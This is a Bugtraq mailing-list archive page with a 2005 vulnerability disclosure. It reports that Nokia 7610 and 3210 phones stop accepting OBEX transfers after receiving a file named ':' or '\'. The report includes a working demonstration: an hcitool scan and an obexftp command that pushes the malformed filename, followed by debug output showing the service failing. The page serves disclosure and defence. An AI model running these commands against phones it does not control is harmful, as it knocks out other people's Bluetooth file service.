Bugtraqmailing list archives

By Date

By Thread

Nokia 7610, 3210 denial of service in OBEX.

Title: Nokia 7610, 3210 Denial of Service in OBEX.Severity: LowAffected: tested in nokia 7610 and nokia 3210 (maybe others symbianphones).Problem type: remoteDetails:----------------------------------------------------------------------------------------------------------They are some flaw in the OBEX implementation in nokia 7610 (V4.0.43715-09-04 RH51), and others, that disable this service if you sendarchive with name ":" or "\". ---- Quote of IROBEX12.pdf  Pag:40, section 4.3 -- (OBEX specification)"Pushing objects into the inbox Objects are pushed into the inbox by using the PUT command with a Name header. The string in the Name header should not contain any path characters such as ‘:’, ‘/’ or ‘\’. Objects withimproperly formed names should be rejected."----The device ask for PIN if you are not paired or ask if you want accept aconnection of the remote box, you need ACCEPT. It have low risk ,becouse dont work if you dont accept the incoming connection.If connection is established, the file is sended and they arent "Newmessage arrived" message, like when you send correct archive. Its ok,the  filename is dropped.The problem is the OBEX service dont work anymore after this, if youtried to send other file or from some vcard from other device, you cantconnect to the remote OBEX service again.Demostration with Linux as client:jim:~# hcitool scanScanning ...        00:13:70:5E:1F:01       7610jim:~# obexftp -b 00:13:70:5E:1F:01 -p \:Browsing 00:13:70:5E:1F:01 ...Channel: 10No custom transportobexftp_cli_open()obexftp_cli_connect_uuid()Connecting...obexftp_cli_connect_uuid() BT 1cli_sync_request()obexftp_sync()client_done()client_done() Found connection number: -1022384746client_done() Sender identifiedobexftp_sync() OBEX_HandleInput = 31obexftp_sync() Done success=1doneSending ":"... obexftp_put_file() Sending : -> :build_object_from_file() Lastmod = 2005-09-18T00:16:42Zcli_sync_request()cli_fillstream_from_file()cli_fillstream_from_file() Read 6 bytescli_fillstream_from_file()cli_fillstream_from_file() Read 0 bytesobexftp_sync()obexftp_sync() OBEX_HandleInput = 0failed: :obexftp_cli_disconnect()Disconnecting...cli_sync_request()failed: disconnectobexftp_cli_close()# Error pushing other file after send ":" filename:jim:~# obexftp -b 00:13:70:5E:1F:01 -p /etc/hostsBrowsing 00:13:70:5E:1F:01 ...Channel: 10No custom transportobexftp_cli_open()obexftp_cli_connect_uuid()Connecting...obexftp_cli_connect_uuid() BT -1failed: connectStill trying to connectobexftp_cli_connect_uuid()Connecting...obexftp_cli_connect_uuid() BT -1failed: connectStill trying to connectobexftp_cli_connect_uuid()Connecting...obexftp_cli_connect_uuid() BT -1failed: connectStill trying to connect----------------------------------------------------------------------------------------------------------Timeline:20 Sept 2005: bug found.21 Sept 2005: Nokia security contacted.24 Sept 2005: Disclosure in NCN - V congress (http://www.noconname.org).26 Sept 2005: Full disclosure.--A. Ramos.mailto: <aramosf () unsec net>http://www.unsec.net

Attachment:_bin
Description:

By Date

By Thread

Current thread:

• Nokia 7610, 3210 denial of service in OBEX.A. Ramos (Sep 27)